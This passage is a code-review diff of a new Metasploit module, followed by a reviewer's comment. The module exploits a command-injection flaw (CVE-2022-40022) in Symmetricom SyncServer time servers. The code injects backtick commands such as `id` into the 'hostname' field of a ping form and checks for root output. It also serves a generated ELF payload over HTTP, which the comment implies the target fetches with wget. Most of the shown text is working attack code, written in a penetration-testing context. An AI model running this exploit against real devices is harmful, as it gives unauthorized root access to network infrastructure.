modules/exploits/linux/http/symmetricom_syncserver_rce.rb

```diff
@@ -0,0 +1,141 @@
+          The S100 through S350 (End of Life) models should be vulnerable to
+          unauthenticated exploitation due to a session handling vulnerability.
+          Later models require authentication which is not provided in this module because we can't test it.
+          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
+          Run 'check' first to determine if vulnerable.
+        },
+        'Author' => [
+          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module
+          'Justin Fatuch Apt4hax', # Exploit PoC
+          'Robert Bronstein' # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2022-40022'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']
+        ],
+        'DisclosureDate' => '2022-08-31',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [ 'Automatic', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),
+        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),
+        OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])
+      ], self.class
+    )
+  end
+
+  def primer; end
+
+  def on_request_uri(cli, req)
+    @pl = generate_payload_exe
+    print_status("#{peer} - Payload request received: #{req.uri}")
+    send_response(cli, @pl)
+  end
+
+  def check
+    uri = '/controller/ping.php'
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' =>
+          {
+            'currentTab' => 'ping',
+            'refreshMode' => 'dirty',
+            'ethDirty' => 'false',
+            'snmpCfgDirty' => 'false',
+            'snmpTrapDirty' => 'false',
+            'pingDirty' => 'true',
+            'hostname' => "\`id\`",
+            'port' => 'eth0',
+            'pingType' => 'ping'
+          }
+    })
+    if res && res.body.to_s =~ /uid=0/
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def request(cmd)
+    uri = '/controller/ping.php'
+    send_request_cgi({
+      'method' => 'POST',
+      'Content-Type' => 'application/x-www-form-encoded',
+      'uri' => uri,
+      'vars_post' =>
+      {
+        'currentTab' => 'ping',
+        'refreshMode' => 'dirty',
+        'ethDirty' => 'false',
+        'snmpCfgDirty' => 'false',
+        'snmpTrapDirty' => 'false',
+        'pingDirty' => 'true',
+        'hostname' => cmd,
+        'port' => 'eth0',
+        'pingType' => 'ping'
+      }
+    })
+  end
+
+  def exploit
+    srvhost = datastore['SRVHOST']
+    srvport = datastore['SRVPORT']
```

Comment:
Rubocop is currently complaining about this line because `srvport` is not being used. Should it be used in the `wget` command down below?